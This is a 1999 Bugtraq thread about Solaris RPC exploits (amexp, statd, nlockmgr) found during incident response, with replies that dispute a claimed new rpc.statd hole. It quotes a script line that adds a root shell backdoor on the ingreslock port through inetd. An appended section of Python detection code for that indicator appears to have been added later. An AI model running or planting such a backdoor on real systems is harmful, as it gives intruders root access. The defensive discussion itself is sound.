Bugtraq mailing list archives

Re: Vulnerability in Solaris 2.6. rpc.statd ?


From: mb () APOLLO GTI NET (mb)
Date: Sat, 28 Aug 1999 15:00:27 -0400


I've seen these exploits multiple times while doing incident response.
The 'amexp' and 'statd' exploits are exploits for automountd.  The
nlockmgr exploit is broken code from someone who apparently didn't
understand buffer overflows or RPC very well.  The command line arguments
are the only things that are identical, other than the fact that both are
RPC exploits.  You cannot conclude that two exploits are identical only
because they both execute, say, '/bin/sh -i.'  The program being executed
usually has nothing to do with the nature of the hole.

I agree with Mr. Wells.  To post to a public mailing list with wild claims
of having found new exploits, on a machine hacked by kids who know
probably even less than you do, is stupid.  If you had a clue, you
would've disassembled these binaries and examined the network traffic
they generated while testing them on safe machines, before going off
making posts about known holes or holes that you decide exist on the basis
of finding a broken exploit.

past, I'd have to say that any company hiring you to secure their machines
has been seriously misled and cheated.  You seem to have little understanding
and knowledge of UNIX and/or UNIX security.

As a result of your ignorance, a lot of already harried administrators
were unnecessarily made paranoid.  Next time, look before you leap.

.mb

On Tue, 24 Aug 1999, Bob Todd wrote:

I found two binary-only exploits on a hacked machine.  The one of most
interest was "amexp" which when executed without arguments presents
the following:

    Usage: ./amexp address cache command type [port]

    Further help:

        address    -    system address
        cache      -    system hostname
        command    -    execute this command
        type       -    0: Solaris 2.5.1 stock,
                            1: Solaris 2.5.1 patched, 2.6 & 2.7
        port       -    optional port to bypass portmapper

A shell script that was included was "go.amexp" which contained:

./amexp $1 $2 "echo 'ingreslock stream tcp nowait root /bin/sh sh' >
/tmp/.xp;/usr/sbin/inetd -s /tmp/.xp" $3

The command is nearly identical to what is used for both tooltalk and
rpc.cmsd attacks.

The proper patches were installed and I do not believe that it is the
statd/automountd exploit since no indirect rpc services execution was
attempted.

This incident is closed.



----- Original Message -----
From: Tabor J . Wells <twells () shore net>
To: Bob Todd <todd () home arc com>
Cc: <BUGTRAQ () securityfocus com>
Sent: Tuesday, August 24, 1999 1:52 PM
Subject: Re: Vulnerability in Solaris 2.6. rpc.statd ?


On Sat, Aug 21, 1999 at 12:31:18PM -0400,
Bob Todd <toddr () ARC COM> is thought to have said:

While performing an on-site incident response at _______, I found several
Solaris-oriented exploit programs including a statd2.6 (others were
calendar manager, tooltalk, and lockd?).  Since there is an exploit
program for statd on Solaris 2.6, I could conclude that Solaris 2.6 statd
is vulnerable to attack.  I have not tried the exploit, but since the
machine was probably compromised by one of these programs, the threat
seems real!!

And did this server have the statd patch installed (106592-02 on sparc and
106593-02 on x86)? Did it have the various security patches for the other
services mentioned installed as well?

Perhaps the program was part of the exploit which allowed indirect RPC
calls with statd that was discussed here (and elsewhere) several weeks
back.

I don't think your conclusion is supported given the information you
provided. Perhaps you could provide more information about the exploit
before rushing to claim that there is a new vulnerability.

Tabor

--

______________________________________________________________________
Tabor J. Wells
twells () smarterliving com
Technology Manager
http://www.smarterliving.com
Smarter Living, Inc.                    It's your time. It's your money.
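
A defender-side check for the indicator left by the go.amexp payload quoted above (an inetd entry on the ingreslock port that spawns a root shell, loaded from a config file in /tmp). This is an added example, not code from the thread; the inetd.conf lines and the inetd command line are constructed samples.

```python
# Constructed sample inetd.conf lines; the last one is the entry that the
# go.amexp script from the thread writes to /tmp/.xp.
SAMPLE_INETD_LINES = """
# service socket proto wait user server args
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd     in.ftpd
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd  in.fingerd
ingreslock stream tcp nowait root /bin/sh sh
"""

SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/usr/bin/sh", "/usr/bin/ksh"}
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/")

def parse_inetd_line(line):
    """Split one inetd.conf entry into named fields; None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split(None, 6)
    if len(fields) < 6:
        return None
    entry = dict(zip(("service", "socket", "proto", "wait", "user", "server", "args"), fields))
    entry.setdefault("args", "")
    return entry

def suspicious_entries(text):
    """Return (service, reason) for entries that look like inetd shell backdoors."""
    findings = []
    for line in text.splitlines():
        e = parse_inetd_line(line)
        if e is None:
            continue
        reasons = []
        if e["server"] in SHELLS:
            reasons.append("server program is an interactive shell")
        if e["server"].startswith(UNTRUSTED_DIRS):
            reasons.append("server program lives in a world-writable directory")
        if reasons and e["user"] == "root":
            reasons.append("runs as root")
        if reasons:
            findings.append((e["service"], "; ".join(reasons)))
    return findings

def alternate_inetd_config(cmdline):
    """Return the config path if an inetd process (from ps output) was started
    with a configuration file outside /etc, as '/usr/sbin/inetd -s /tmp/.xp' is;
    otherwise None.  Solaris inetd takes the config file as a positional argument."""
    parts = cmdline.split()
    if not parts or not parts[0].endswith("inetd"):
        return None
    for p in parts[1:]:
        if not p.startswith("-") and not p.startswith("/etc/"):
            return p
    return None
```

Running the two checks against the real /etc/inet/inetd.conf and the output of `ps -ef` would surface both halves of the payload: the rogue ingreslock entry and the second inetd reading a config file under /tmp.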